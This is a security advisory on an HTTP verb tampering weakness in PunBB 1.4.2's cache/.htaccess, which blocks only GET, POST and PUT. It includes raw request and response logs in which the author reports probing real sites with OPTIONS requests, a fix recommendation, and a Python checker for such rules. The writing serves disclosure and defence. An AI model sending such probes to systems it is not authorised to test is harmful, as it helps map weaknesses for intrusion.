===============================================================
Vulnerable software: PunBB 1.4.2
Official site: http://punbb.informer.com/
Vuln: HTTP Verb Tampering.
Checked version: PunBB 1.4.2
===============================================================

About software:
===============================================================

PunBB is a fast and lightweight PHP-powered discussion board. It is released under the GNU General Public License.
Its primary goals are to be faster, smaller and less graphically intensive as compared to other discussion boards.
PunBB has fewer features than many other discussion boards, but is generally faster and outputs smaller,
semantically correct XHTML-compliant pages.

*Copy/paste from official wiki.*
===============================================================
About vuln:

punbb-1.4.2 is vulnerable to HTTP Verb Tampering because it tries to restrict HTTP access to its own cache/ directory
in an insecure manner.
I'm pretty sure we can call the following approach "blacklisting".
But as we all know, the blacklisting approach sucks, as always.
Take a look:

==========/punbb-1.4.2/cache/.htaccess=====

<Limit GET POST PUT>
Order Allow,Deny
Deny from All
</Limit>
=====================================
Note: this file ships by default with the latest 1.4.2 version.
Other versions may also be affected, but I didn't check.

With this .htaccess file in its cache/ directory, PunBB denies HTTP GET, POST and PUT requests to the files in the cache directory.
But what about other HTTP methods?
Here are a few "fingerprinting" tests against real sites (notice the status codes):

===============================================================
TEST 1:  GET method

REQUEST METHOD: GET
URL: http://examplesite/punbb/cache/index.html
Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive


Server Returns:

HTTP/1.1 403 Forbidden
Date: Tue, 02 Apr 2013 00:26:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 224
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /punbb/cache/index.html
on this server.</p>
</body></html>
===============================================================

TEST 2
REQUEST METHOD: POST
URL: http://examplesite/punbb/cache/index.html

Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive
Content-Length: 42


$_POST data to send:

&id=this is a test for HTTP VERB tampering



Server Returns:

HTTP/1.1 403 Forbidden
Date: Tue, 02 Apr 2013 00:28:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 224
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /punbb/cache/index.html
on this server.</p>
</body></html>



===============================================================

TEST 3: Fun begins.
Request method:   OPTIONS
URL: http://examplesite/punbb/cache/index.html

Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive
Content-Length: 0


Server returns:
HTTP/1.1 200 OK         <===========Notice
Date: Tue, 02 Apr 2013 00:32:09 GMT
Server: Apache
Allow: GET,HEAD,POST,OPTIONS
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html



======================================

TEST 4: Notice again status code: 404
Method: OPTIONS
URL: http://examplesite/punbb/cache/not_existense_filename_checking_notice_status_code.php


Host: examplesite
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62
Connection: keep-alive
Content-Length: 0



Server returns:

HTTP/1.1 404 Not Found
Date: Tue, 02 Apr 2013 00:36:34 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 264
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /punbb/cache/not_existense_filename_checking_notice_status_code.php was not found on this server.</p>
</body></html>


======================================


This way an attacker may, for example, access cache files.
In itself this issue may open up new attacks or give an attacker more chances.

Do not use the blacklisting approach; use whitelisting instead.
So don't use the Limit directive in your .htaccess file.
In this case a simple  *deny from all*  will do the job instead. (If I'm wrong, please correct me.)
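
Added example (not part of the original advisory and not PunBB code): a small Python check that flags .htaccess files using the <Limit> blacklist pattern shown above and reports which methods the deny rule leaves uncovered. The function name audit_htaccess, the reference method set and the two sample files are assumptions made for this example.

```python
import re

# Reference set to compare against (assumption for this example; Apache
# accepts more methods than these, e.g. the WebDAV verbs).
REFERENCE_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "PATCH"}

# "<Limit " needs whitespace after the name, so <LimitExcept ...> never matches.
LIMIT_OPEN = re.compile(r"^\s*<Limit\s+([^>]+)>\s*$", re.IGNORECASE)
LIMIT_CLOSE = re.compile(r"^\s*</Limit>\s*$", re.IGNORECASE)
DENY_ALL = re.compile(r"^\s*(Deny\s+from\s+all|Require\s+all\s+denied)\s*$",
                      re.IGNORECASE)

# Constructed samples: the cache/.htaccess quoted in the advisory, and the
# unscoped form the advisory recommends.
SHIPPED = "<Limit GET POST PUT>\nOrder Allow,Deny\nDeny from All\n</Limit>\n"
UNSCOPED = "Order Allow,Deny\nDeny from All\n"


def audit_htaccess(text):
    """Return one finding per <Limit> block that wraps a deny-all rule."""
    findings = []
    block = None  # [start_line, methods, has_deny] while inside <Limit>
    for lineno, line in enumerate(text.splitlines(), 1):
        opened = LIMIT_OPEN.match(line)
        if opened:
            methods = set(opened.group(1).split())
            if "GET" in methods:
                methods.add("HEAD")  # Apache applies a GET limit to HEAD too
            block = [lineno, methods, False]
        elif block and DENY_ALL.match(line):
            block[2] = True
        elif block and LIMIT_CLOSE.match(line):
            start, methods, has_deny = block
            if has_deny:
                findings.append({
                    "line": start,
                    "listed": sorted(methods),
                    "uncovered": sorted(REFERENCE_METHODS - methods),
                })
            block = None
    return findings


if __name__ == "__main__":
    for name, text in (("shipped", SHIPPED), ("unscoped", UNSCOPED)):
        print(name, audit_htaccess(text))
```

An empty result means the deny rule is not scoped to a method list, so it applies to every method.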



=========================================
               KUDOSSSSSSS
=========================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
http://exploit-db.com/

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE

*Super special KUDOS to my bro Brendan Coles!
Love you and Respect you dude!
Thank you!*
===========================================

/AkaStep